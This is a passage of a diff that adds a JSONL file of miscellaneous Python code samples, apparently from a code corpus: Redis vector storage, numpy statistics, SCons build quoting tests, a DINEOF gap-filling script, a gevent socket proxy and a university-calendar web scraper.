diff --git "a/1681.jsonl" "b/1681.jsonl" new file mode 100644--- /dev/null +++ "b/1681.jsonl" @@ -0,0 +1,596 @@ +{"seq_id":"119237579","text":"# -*- coding: utf-8 -*-\n\n# Copyright (c) 2013 Ole Krause-Sparmann\n\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# -*- coding: utf-8 -*-\n\n# Copyright (c) 2013 Ole Krause-Sparmann\n\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\nimport redis\nimport json\nimport numpy\n\nfrom nearpy.storage.storage import Storage\nfrom nearpy.utils import want_string\n\n\nclass RedisStorage(Storage):\n \"\"\" Storage using redis. \"\"\"\n\n def __init__(self, redis_object):\n \"\"\" Uses specified redis object for storage. \"\"\"\n self.redis_object = redis_object\n\n def store_vector(self, hash_name, bucket_key, v, data):\n \"\"\"\n Stores vector and JSON-serializable data in bucket with specified key.\n \"\"\"\n redis_key = 'nearpy_%s_%s' % (hash_name, bucket_key)\n\n # Make sure it is a 1d vector\n v = numpy.reshape(v, v.shape[0])\n\n val_dict = {'vector': v.tolist()}\n if data:\n val_dict['data'] = data\n\n self.redis_object.rpush(redis_key, json.dumps(val_dict))\n\n def get_bucket(self, hash_name, bucket_key):\n \"\"\"\n Returns bucket content as list of tuples (vector, data).\n \"\"\"\n redis_key = 'nearpy_%s_%s' % (hash_name, bucket_key)\n items = self.redis_object.lrange(redis_key, 0, -1)\n results = []\n for item_str in items:\n val_dict = json.loads(want_string(item_str))\n vector = numpy.fromiter(val_dict['vector'], dtype=numpy.float64)\n if 'data' in val_dict:\n results.append((vector, val_dict['data']))\n else:\n results.append((vector, None))\n\n return results\n\n def clean_buckets(self, hash_name):\n \"\"\"\n Removes all buckets and their content for specified hash.\n \"\"\"\n bucket_keys = self.redis_object.keys(pattern='nearpy_%s_*' % hash_name)\n for bucket_key in bucket_keys:\n self.redis_object.delete(bucket_key)\n\n def clean_all_buckets(self):\n \"\"\"\n Removes all buckets from all hashes and their content.\n \"\"\"\n bucket_keys = self.redis_object.keys(pattern='nearpy_*')\n for bucket_key in bucket_keys:\n self.redis_object.delete(bucket_key)\n","sub_path":"nearpy/storage/storage_redis.py","file_name":"storage_redis.py","file_ext":"py","file_size_in_byte":3414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"435843777","text":"# Problem: Need to run statistical functions on the contents of a matrix\n\nimport numpy as np\n\n# create matrix\nmatrix = np.array([\n [1,2,3],\n [4,5,6],\n [7,8,9]\n])\n\n# return mean\nprint(\"Matrix mean: \" + str(np.mean(matrix)))\n\n# return variance\nprint(\"Matrix variance: \" + str(np.var(matrix)))\n\n# return std-dev\nprint(\"Matrix std: \" + str(np.std(matrix)))\n","sub_path":"data_objects/matrix_stats.py","file_name":"matrix_stats.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"529920584","text":"import p5d\n\n# Learning Processing\n# Daniel Shiffman\n# http://www.learningprocessing.com\n\n# Example 4-3: Varying variables\n\n# Declare and initialize two integer variables at the top of the code.\ncircleX = 0\ncircleY = 100\n\ndef setup():\n pg.size(480, 270)\n\ndef draw():\n pg.background(255)\n pg.stroke(0)\n pg.fill(175)\n # Use the variables to specify the location of an ellipse.\n pg.ellipse(circleX, circleY, 50, 50)\n\n # An assignment operation that increments the value of circleX by 1.\n circleX = circleX + 1\n\npg = p5d.PGraphics()\npg.setupFunc(setup)\npg.drawFunc(draw)\npg.listen()","sub_path":"clients/Python/Example_04_03.py","file_name":"Example_04_03.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"340553529","text":"from PIL import Image\nimport numpy as np\nimport math\nimport variables as var # file of picture size and filename\n\n\ndef png2txtFile(_nmbrOfNeurons):\n\n for i in var.lettersAvailable:\n img = Image.open(var.directoryPNG + str(i));\n img = img.convert('L'); # L for luminescence\n caractere = np.fromiter(iter(img.getdata()), np.int) # convert pic to matrix\n caractere.resize(img.height, img.width); # resize to the good size the matrix\n\n caractere[caractere < 128] = 1;\n caractere[caractere >= 128] = -1;\n\n # caractere = -1 * caractere;\n\n arr = np.full((var._picSize_X, var._picSize_Y), -1, dtype=np.int); #dtype - data type\n\n arr = caractere;\n\n np.savetxt(var.directoryTXT + str(i) + '.txt', arr, delimiter=',', fmt='%i',newline ='\\n'); # fmt = %i = format integer\n\n\ndef loadReferences(_nmbrOfNeurons):\n # lettersMaj = np.array(['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']);\n # lettersMin = np.array(['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']);\n # carac = np.array(['!', '#', '&', '*', '(', ')', '_', '-', '+', '=', '[', ']', '\\ ', '\"', \"'\", ':', ';', '?', '.', '>', '<', ',']);\n # numbers = np.array(['1', '2', '3', '4', '5', '6', '7', '8', '9', '0']);\n # numbersreduce = np.array(['1_', '2_', '3_', '4_', '5_', '6_', '7_', '8_', '9_', '0_']);\n\n\n # letters = np.concatenate((lettersMaj, lettersMin, carac, numbers, numbersreduce));\n # letters = np.array(['1', '2', '3', '4', '5', '6', '0']);\n # letters = lettersMaj;\n\n png2txtFile(_nmbrOfNeurons);\n\n arr = np.full((var.lettersAvailable.size, _nmbrOfNeurons), 0, dtype=np.float32); #\n for i in range(var.lettersAvailable.size):\n temp = np.loadtxt(var.directoryTXT + str(var.lettersAvailable[i]) + '.txt', delimiter = ',', dtype=np.float32);\n # print(temp[temp ==-1].size)\n arr[i,:] = temp.flatten(); # flatten = transform a matrix into a singular long array\n\n return arr;\n\ndef loadPattern(filename, _nmbrOfNeurons):\n\n img = Image.open(filename);\n img = img.convert('L');\n\n caractere = np.fromiter(iter(img.getdata()), np.float32)\n caractere.resize(img.height, img.width);\n\n\n caractere[caractere < 128] = 1;\n caractere[caractere >= 128] = -1;\n\n # caractere = -1 * caractere;\n\n arr = np.full((var._picSize_X, var._picSize_Y), -1, dtype=np.int)\n arr = caractere;\n\n temp = arr;\n temp = temp.astype(np.uint8)\n img = Image.fromarray(temp);\n img = img.resize((var._picSize_X * 7, var._picSize_Y * 7))\n img.show(title = \"Picture after 0 iterations\");\n # print(filename)\n # pause\n arr = arr.flatten();\n return arr;\n","sub_path":"mod.py","file_name":"mod.py","file_ext":"py","file_size_in_byte":2813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"337155983","text":"import os\nimport sys\nimport SCons.Script\nfrom SCons.Environment import Environment\n\n# Setup the construction env\ntools = ['gcc']\nenv = Environment(tools=tools)\nenv.EnsureSConsVersion(3, 0, 0)\n\n#env.Replace(ENV=os.environ)\nenv.Replace(ENV={'PATH': os.environ['PATH']})\n\n# Compiler commands\n# This is just because I happen to have the arm version of gcc setup on windows at the time\nenv.Replace(CROSS_COMPILE='arm-none-eabi-')\n\nenv.Replace(AS='${CROSS_COMPILE}as')\nenv.Replace(CC='${CROSS_COMPILE}gcc')\nenv.Replace(CPP='${CROSS_COMPILE}gcc')\nenv.Replace(CXX='${CROSS_COMPILE}g++')\nenv.Replace(LD='${CROSS_COMPILE}ld')\nenv.Replace(OBJCOPY='${CROSS_COMPILE}objcopy')\nenv.Replace(SIZE='${CROSS_COMPILE}size')\nenv.Replace(STRIP='${CROSS_COMPILE}strip')\nenv.Replace(AR='${CROSS_COMPILE}ar')\n\n\n# Lets try adding some cpppath's\nenv.AppendUnique(CPPPATH=[env.GetLaunchDir()])\nenv.AppendUnique(CPPPATH=['testdir'])\nenv.AppendUnique(CPPPATH=['../src1 with spaces'])\n\n# The first 3 examples below work fine with CPPPATH\n\ndef example1():\n # At this stage we're testing the wrappering of CPPPATH with quotes for include directories\n # This works fine / is properly quoted and escaped\n env.Object('src1.o', '../src1 with spaces/src1.c')\n\ndef example2():\n # Use Command with action\n # This works fine / is properly quoted and escaped\n act = SCons.Action.Action('${CPP} ${CFLAGS} ${CCFLAGS} ${_CCCOMCOM} -c -o ${TARGET} ${SOURCES}')\n env.Command('src1.o', '../src1 with spaces/src1.c', act)\n\ndef example3():\n # Use Command with string\n # This works fine / is properly quoted and escaped\n env.Command('src1.o', '../src1 with spaces/src1.c',\n '${CPP} ${CFLAGS} ${CCFLAGS} ${_CCCOMCOM} -c -o ${TARGET} ${SOURCES}')\n\n\n\n\n# These examples are not escaped / quoted properly for CPPPATH when one of the directories has a space in\n\ndef example4():\n # Builder using a string\n # No quoting for CPPPATH in ${_CCCOMCOM}\n bld = env.Builder(\n action='${CPP} ${CFLAGS} ${CCFLAGS} ${_CCCOMCOM} -c -o ${TARGET} ${SOURCES}')\n env.AppendUnique(BUILDERS={'Example4': bld})\n env.Example4('src1.o', '../src1 with spaces/src1.c')\n\ndef example5():\n # This would work if we used SCons.Action.Action instead\n bld = env.Builder(\n action=env.Action('${CPP} ${CFLAGS} ${CCFLAGS} ${_CCCOMCOM} -c -o ${TARGET} ${SOURCES}'))\n env.AppendUnique(BUILDERS={'Example5': bld})\n env.Example5('src1.o', '../src1 with spaces/src1.c')\n\n\ndef example6():\n # This wont pick up on target or source, or escape CPPPATH\n bld = env.Builder(action=__Build_example6)\n env.AppendUnique(BUILDERS={'Example6': bld})\n env.Example6('src1.o', '../src1 with spaces/src1.c')\n\ndef __Build_example6(target, source, env):\n act = env.Action('${CPP} ${CFLAGS} ${CCFLAGS} ${_CCCOMCOM} -c -o ${TARGET} ${SOURCES}')\n env.Execute(act)\n\n\ndef example7():\n # This wiil pickup on target or source, but not escape CPPPATH\n bld = env.Builder(action=__Build_example7)\n env.AppendUnique(BUILDERS={'Example7': bld})\n env.Example7('src1.o', '../src1 with spaces/src1.c')\n\ndef __Build_example7(target, source, env):\n tststr = env.subst('${CPP} ${CFLAGS} ${CCFLAGS} ${_CCCOMCOM} -c -o ${TARGET} ${SOURCES}',\n source=source, target=target)\n env.Execute(tststr)\n\n\nexample5()\n","sub_path":"example2/sconstruct.py","file_name":"sconstruct.py","file_ext":"py","file_size_in_byte":3294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"356461997","text":"# Copyright (c) 2020 Xiaomi Corporation (authors: Fangjun Kuang)\n# See ../../../../LICENSE for clarification regarding multiple authors\n\nfrom typing import Optional\nfrom typing import Union\n\nimport torch\nimport _k2\n\n\n# Create a class `RaggedFloat` in python for backprop.\n#\n# TODO(fangjun): wrap methods from _k2.RaggedFloat if needed.\nclass RaggedFloat(object):\n '''A ragged float tensor.\n\n It is a wrapper of :class:`_k2.RaggedFloat`, whose purpose\n is to implement autograd for :class:`_k2.RaggedFloat`.\n\n Currently, it is used only in `k2.ragged.normalize_scores`.\n '''\n\n def __init__(self,\n ragged: Union[str, _k2.RaggedFloat, _k2.RaggedShape],\n values: Optional[torch.Tensor] = None):\n '''Construct an instance of :class:`k2.RaggedFloat`.\n\n Args:\n ragged:\n It can be one of the following types:\n\n - A string. Example value::\n\n [ [1 2] [] [5 10 20] ]\n\n - An instance of :class:`_k2.RaggedFloat`\n\n - An instance of :class:`_k2.RaggedShape`. In this case, you\n have to provide the additional argument `values`.\n values:\n Required only when `ragged` is an instance of\n :class:`_k2.RaggedShape`. It is a 1-D torch.Tensor with dtype\n torch.float32.\n '''\n if isinstance(ragged, str):\n ragged = _k2.RaggedFloat(ragged)\n assert values is None\n elif isinstance(ragged, _k2.RaggedShape):\n assert values is not None\n ragged = _k2.RaggedFloat(ragged, values)\n\n assert isinstance(ragged, _k2.RaggedFloat)\n\n self.ragged = ragged\n if values is not None:\n self._values = values\n else:\n self._values = ragged.values()\n\n def __str__(self) -> str:\n return str(self.ragged)\n\n @property\n def values(self) -> torch.Tensor:\n '''Return the underlying array as a 1-D torch.Tensor.\n '''\n return self._values\n\n @property\n def grad(self) -> torch.Tensor:\n return self._values.grad\n\n @property\n def requires_grad(self) -> bool:\n '''\n Return True if this object requires grad.\n Return False otherwise.\n '''\n return self._values.requires_grad\n\n def requires_grad_(self, requires_grad: bool) -> 'RaggedFloat':\n '''Change if autograd should record operations on this tensor.\n\n Sets the `values`'s requires_grad attribute in-place.\n Returns this object.\n You can test whether this object has the requires_grad property\n true or false by accessing self.requires_grad property.\n\n Caution:\n This is an **in-place** operation as you can see that the function\n name ends with `_`.\n\n Args:\n requires_grad:\n If autograd should record operations on this object or not.\n\n Returns:\n This object itself.\n '''\n self._values.requires_grad_(requires_grad)\n return self\n","sub_path":"k2/python/k2/ragged/tensor.py","file_name":"tensor.py","file_ext":"py","file_size_in_byte":3068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"550258310","text":"__author__ = 'GCassani'\n\n\"\"\"Helper functions to pre-process the corpus\"\"\"\n\n\ndef get_pos_mapping(input_file):\n\n \"\"\"\n :param input_file: a .txt fil containing two elements per line separated by a white space. The first element of\n each line is used as a key in a dictionary, and the second value in the line is used as the\n corresponding value. If there duplicates among the first elements (the keys), the output\n dictionary will contain the corresponding second element (the value) from the last line in\n which the first element occurred.\n :return out_dict: a dictionary containing elements from the input file arranged in the specified way\n \"\"\"\n\n out_dict = {}\n\n with open(input_file, 'r') as f:\n for line in f:\n pos = line.rstrip(\"\\n\").split()\n out_dict[pos[0]] = pos[1]\n\n return out_dict\n\n\n########################################################################################################################\n\n\ndef encoding_features(corpus_name, reduced=True, uniphones=True, diphones=False, triphones=False, syllables=False,\n stress_marker=False, outcomes='tokens', boundaries=False, log='', verbose=True):\n\n \"\"\"\n :param corpus_name: a string indicating the name of the corpus being processed\n :param reduced: a boolean indicating whether reduced phonological forms are extracted from CELEX or not\n :param uniphones: a boolean indicating whether single phonemes are to be considered while encoding input\n utterances\n :param diphones: a boolean indicating whether sequences of two phonemes are to be considered while\n encoding input utterances\n :param triphones: a boolean indicating whether sequences of three phonemes are to be considered while\n encoding input utterances\n :param syllables: a boolean indicating whether syllables are to be considered while encoding input\n utterances\n :param stress_marker: a boolean indicating whether stress markers from the phonological representations of\n Celex need to be preserved or can be discarded\n :param outcomes: a string indicating which outcomes to use, whether 'tokens' (default) or 'lemmas'\n :param boundaries: a boolean specifying whether word boundaries are considered when training on full\n utterances\n :param log: the path to a file where the log is printed. Default is empty string, meaning that no\n file is provided and everything is printed to standard output.\n :param verbose: a boolean indicating whether to print information to screen (default is True)\n :return encoding_string: a string that tells which parameters where used to encode the corpus; it can be appended\n to file names to unequivocally determine which parameters were used to create a certain\n file and derived measures.\n \"\"\"\n\n desired_cues = []\n encoding_string = ''\n\n if reduced:\n encoding_string += 'r'\n else:\n encoding_string += 'f'\n\n if boundaries:\n encoding_string += 'b'\n else:\n encoding_string += 'c'\n\n if uniphones:\n desired_cues.append('uniphones')\n encoding_string += 'u'\n if diphones:\n desired_cues.append('diphones')\n encoding_string += 'd'\n if triphones:\n desired_cues.append('triphones')\n encoding_string += 't'\n if syllables:\n desired_cues.append('syllables')\n encoding_string += 's'\n\n if outcomes == 'tokens':\n encoding_string += 'k'\n elif outcomes == 'lemmas':\n encoding_string += 'l'\n else:\n raise ValueError(\"Unrecognized specification concerning lexical outcomes. \"\n \"Please, choose either 'tokens' or 'lemmas'.\")\n\n if stress_marker:\n desired_cues.append('with stress marker')\n encoding_string += 'm'\n else:\n desired_cues.append('without stress marker')\n encoding_string += 'n'\n\n num_hash = 120\n desired_cues = \", \".join(desired_cues)\n padding_cues = \" \" * (num_hash - 15 - len(desired_cues))\n padding_outcomes = \" \" * (num_hash - 19 - len(outcomes))\n padding_corpus = \" \" * (num_hash - 17 - len(corpus_name))\n if log:\n with open(log, \"w+\") as log_file:\n log_file.write(\"\\n\\n\")\n log_file.write(\"#\" * num_hash)\n log_file.write(\"\\n\")\n log_file.write(\"##### CORPUS: \" + corpus_name + padding_corpus + \"##\")\n log_file.write(\"\\n\")\n log_file.write(\"##### CUES: \" + desired_cues + padding_cues + \"##\")\n log_file.write(\"\\n\")\n log_file.write(\"##### OUTCOMES: \" + outcomes + padding_outcomes + \"##\")\n log_file.write(\"\\n\")\n log_file.write(\"#\" * num_hash)\n log_file.write(\"\\n\\n\")\n else:\n if verbose:\n print()\n print(\"#\" * num_hash)\n print(\"##### CORPUS: \" + corpus_name + padding_corpus + \"##\")\n print(\"##### CUES: \" + desired_cues + padding_cues + \"##\")\n print(\"##### OUTCOMES: \" + outcomes + padding_outcomes + \"##\")\n print(\"#\" * num_hash)\n print()\n\n return encoding_string\n","sub_path":"corpus/encode/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":5563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"197493657","text":"#import numpy.ma as ma\nimport netCDF4 as nc\nimport subprocess\nimport struct\nfrom os.path import expanduser\nimport os\n\ndineof_dir = 'derived/data_filling/chl_modis'\n\n# Begin function /dineof/\ndef dineof(data, mask, dineof_param_file):\n '''\n Purpose : Execute the DINEOF data filling algorithm using\n the tool downloaded from:\n http://http://modb.oce.ulg.ac.be\n Arguments : \n * data - nlat x nlon x T masked array of data to be filled.\n * mask - nlat x nlon boolean array indicating land pixels\n (data not to be completed).\n * path_to_dineof - path to the executable tool\n * dineof_param_file - path to the dineof file to set the \n parameters of the tool.\n Returns : \n * data_filled - nlat x nlon x T filled masked array\n * eofs - nlat x nlon x neof masked array of the EOF loadings\n of the filled data array.\n * s_values - neof vector of the singular values of the \n filled data array.\n * time_fct - T x neof matrix of the EOF time-series\n of the filled data matrix.\n Throws : none\n '''\n data = data.copy()\n data[data.mask] = np.nan\n ## prepare the data in NetCDF format for DINEOF program\n [nb_lats, nb_lons, T] = np.shape(data)\n\n # data file\n f = nc.Dataset(os.path.join(dineof_dir, 'data.nc'), 'w')\n f.createDimension('time', T)\n f.createDimension('lons', nb_lons)\n f.createDimension('lats', nb_lats)\n\n time = f.createVariable('time', 'd', ('time',))\n time[:] = np.arange(T)\n\n data_nc = f.createVariable('data', 'd', ('time', 'lons', 'lats'))\n data_nc[:, :, :] = np.transpose(data, [2, 1, 0])\n f.close()\n\n # mask file\n f = nc.Dataset(os.path.join(dineof_dir, 'mask.nc'), 'w')\n f.createDimension('lons', nb_lons)\n f.createDimension('lats', nb_lats)\n\n mask_nc = f.createVariable('mask', 'd', ('lons', 'lats'))\n tmp = np.ones([nb_lons, nb_lats])\n tmp[mask.T] = 0.\n mask_nc[:, :] = tmp\n f.close()\n\n # run dineof command\n# command = path_to_dineof + ' ' + dineof_param_file + '; exit 0'\n# output = subprocess.check_output(command, stderr=subprocess.STDOUT,\n# shell=True) ## TODO Security issue\n\n# print output\n # f = open( 'log', 'w' )\n # f.write( output )\n # f.close()\n\n# output_lines = output.splitlines()\n# index_recon = output_lines.index(\n# ' Minimum reached in cross-validation') - 2\n# exp_error = float(output_lines[index_recon].split()[1])\n\n# if cv_mode:\n# print exp_error\n# else:\n# exp_error = np.nan\n# print output\n\n## End function /dineof/\n\n## Begin setting DINEOF parameters\nparams = dict()\nparams[ 'data' ] = '[data.nc#data]'\nparams[ 'mask' ] = \"['mask.nc#mask']\"\nparams[ 'time' ] = \"'data.nc#time'\"\nparams[ 'alpha' ] = '0.005'\nparams[ 'numit' ] = '30'\n#\n# Sets the numerical variables for the computation of the required\n# singular values and associated modes.\n#\n# Give 'nev' the maximum number of modes you want to compute \nparams[ 'nev' ] = '30'\n#\n# Give 'neini' the minimum number of modes you want to compute \n#\nparams[ 'neini' ] = '2'\n#\n# Give 'ncv' the maximal size for the Krylov subspace \n# (Do not change it as soon as ncv > nev+5) \n# ncv must also be smaller than the temporal size of your matrix\n#\nparams[ 'ncv' ] = '56'\n#\n# Give 'tol' the treshold for Lanczos convergence \n# By default 1.e-8 is quite reasonable \n#\nparams[ 'tol' ] = '1.0e-8'\n#\n# Parameter 'nitemax' defining the maximum number of iteration allowed \n# for the stabilisation of eofs obtained by the cycle ((eof\n# decomposition <-> truncated reconstruction and replacement of missing\n# data)). An automatic criteria is defined by the following parameter\n# 'itstop' to go faster \n#\nparams[ 'nitemax' ] = '1000'\n#\n# Parameter 'toliter' is a precision criteria defining the threshold\n# of automatic stopping of dineof iterations, once the ratio \n# (rms of successive missing data reconstruction)/stdv(existing data) \n# becomes lower than 'toliter'. \n#\nparams[ 'toliter' ] = '1.0e-3'\n#\n# Parameter 'rec' for complete reconstruction of the matrix \n# rec=1 will reconstruct all points; rec=0 only missing points\n#\nparams[ 'rec' ] = '1'\n#\n# Parameter 'eof' for writing the left and right modes of the\n# input matrix. Disabled by default. To activate, set to 1\n#\nparams[ 'eof' ] = '1'\n#\n# Parameter 'norm' to activate the normalisation of the input matrix\n# for multivariate case. Disabled by default. To activate, set to 1\n#\nparams[ 'norm' ] = '0'\n#\n# Output folder. Left and Right EOFs will be written here \n#\nparams[ 'Output' ] = '.'\n#\n# user chosen cross-validation points, \n# remove or comment-out the following entry if the cross-validation \n# points are to be chosen \n# internally\n#\n# clouds = 'crossvalidation.clouds'\nparams[ 'clouds' ] = 'crossval_mask.dat'\n#print params['clouds']\n#\n# \"results\" contains the filenames of the filled data\n#\n#results = ['All_95_1of2.sst.filled']\n#results = ['Output/F2Dbelcolour_region_period_datfilled.gher']\n#\nparams[ 'results' ] = \"['chl.filled']\"\n# params[ 'results' ] = \"['chl.filled']\"\n#\n# seed to initialize the random number generator\n#\nparams[ 'seed' ] = '243435'\n#\n#\n#!-------------------------!\n#! cross-validation points !\n#!-------------------------!\n#\n#number_cv_points = 7000\n#\n#cloud surface size in pixels \n#params[ 'cloud_size' ] = '100'\n#\n#cloud_mask = 'crossvalidation.mask'\n# params[ 'cloud_mask' ] = 'crossvalidation.mask'\n#\n## End Setting DINEOF paramters\n\n## Begin function /genParamFile/\ndef genParamFile(params, param_file):\n str = ''\n for key in params:\n str += key + ' = ' + params[ key ] + '\\n'\n \n f = open(param_file, 'w')\n f.write(str)\n f.close()\n## End function /genParamFile/\n\n\n\n\n\n\n\n\n\n\n\n\nimport os\nimport scipy.io as sio\nimport numpy.ma as ma\nimport numpy as np\n\nchl = sio.loadmat(os.path.join(dineof_dir, 'chl.mat'))['chl']\nmask = sio.loadmat(os.path.join(dineof_dir, 'mask.mat'))['mask']\nchl = ma.masked_invalid(chl)\nchl = np.log(chl)\nchl_average = chl.mean(axis=2)\nT = chl.shape[2]\ndata = chl - np.tile(chl_average[:,:,np.newaxis], (1,1,T))\nmask = mask == 0\n\nparam_file = os.path.join(dineof_dir, 'dineof.init')\nsio.savemat(os.path.join(dineof_dir, 'chl_average.mat'), {'chl':chl_average.data})\n\ngenParamFile( params, param_file )\n\ndineof(data, mask, param_file)\n\n\n\n\n\n","sub_path":"scripts/data_filling/chl_modis_dineof/3_prepare_dineof.py","file_name":"3_prepare_dineof.py","file_ext":"py","file_size_in_byte":6392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"257593318","text":"#\n# Copyright 2016 iXsystems, Inc.\n# All rights reserved\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted providing that the following conditions\n# are met:\n# 1. Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# 2. Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n#\n# THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR\n# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY\n# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS\n# OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)\n# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,\n# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING\n# IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n#\n#####################################################################\n\nimport gevent\nimport socket\nimport logging\nfrom gevent.lock import RLock\n\n\nBUFSIZE = 4096\n\n\nclass ReverseProxyServer(object):\n def __init__(self):\n self.logger = logging.getLogger(self.__class__.__name__)\n self.proxies = {}\n self.rlock = RLock()\n\n def unix_to_tcp_proxy(self, listen, target):\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)\n s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n s.bind(('', listen))\n s.listen(1)\n\n def reader(cfd, sfd):\n buffer = bytearray(BUFSIZE)\n while True:\n try:\n n = sfd.recv_into(buffer)\n if n == 0:\n break\n\n cfd.sendall(buffer[:n])\n except OSError:\n break\n\n def writer(cfd, sfd):\n buffer = bytearray(BUFSIZE)\n while True:\n try:\n n = cfd.recv_into(buffer)\n if n == 0:\n break\n\n sfd.sendall(buffer[:n])\n except OSError:\n break\n\n while True:\n cfd, addr = s.accept()\n self.logger.debug('New client {0} on {1}'.format(addr, listen))\n\n sfd = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM, 0)\n sfd.connect(target)\n gevent.spawn(reader, cfd, sfd)\n gevent.spawn(writer, cfd, sfd)\n\n def add_proxy(self, listen, target, timeout=300):\n with self.rlock:\n self.logger.debug('Adding proxy from {0} to 0.0.0.0:{1}'.format(target, listen))\n worker = gevent.spawn(self.unix_to_tcp_proxy, listen, target)\n self.proxies[listen] = worker\n\n def remove_proxy(self, listen):\n with self.rlock:\n self.logger.debug('Adding proxy to 0.0.0.0:{0}'.format(listen))\n worker = self.proxies.get(listen)\n if not worker:\n return\n\n gevent.kill(worker)\n del self.proxies[listen]\n","sub_path":"src/containerd/src/proxy.py","file_name":"proxy.py","file_ext":"py","file_size_in_byte":3446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"244952347","text":"#!/usr/bin/env python3\n\ndef show_choice():\n print('Choose:\\t1. Copy\\n\\t2. Zip\\n\\t3. Exit.')\n\ndef copy():\n print('Copy done.')\n\ndef zip():\n print('zip done.')\n\n\n\ndef wrong_choice():\n print('<<',c,'>> is not a correct answer!')\n\nshow_choice()\nwhile True:\n c=input('what is your choice?')\n try:\n c=int(c)\n except ValueError:\n print('Not a string!')\n if c==1:\n copy()\n break\n elif c==2:\n zip()\n break\n elif c==3:\n print('Good Bye!')\n break\n else:\n wrong_choice()\n\n","sub_path":"new_backup.py","file_name":"new_backup.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"444891137","text":"\n\n#calss header\nclass _LANCE():\n\tdef __init__(self,): \n\t\tself.name = \"LANCE\"\n\t\tself.definitions = [u'to cut the skin with a sharp tool in order to release infected matter that has collected under it: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'verbs'\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/verbs/_lance.py","file_name":"_lance.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"142397224","text":"import requests\nimport json\nfrom bs4 import BeautifulSoup\n\nurl = 'https://student.portal.chalmers.se/sv/chalmersstudier/Sidor/Lasarstider.aspx'\n\nresponse = requests.get(url)\n\nsoup = BeautifulSoup(response.text, \"html.parser\")\n\ntext = soup.findAll('span')\n\n# For debugging purposes\ndef test_scrape():\n # Test the output of scraper\n current_line = 0\n for line in text:\n if line.string is not None:\n if \"Självstudier\" in line.string or \"påsk\" in line.string:\n print(text[current_line + 2].string)\n current_line = current_line + 1\n\n\n# Iterate through text to find specific lines which are then used to determine\n# the position of sought dates. Dumps the results as a json-formatted object\n# in source directory in a txt file\ndef scrape():\n # Store dates when a period starts\n data = {}\n current_line = 0\n for line in text:\n if 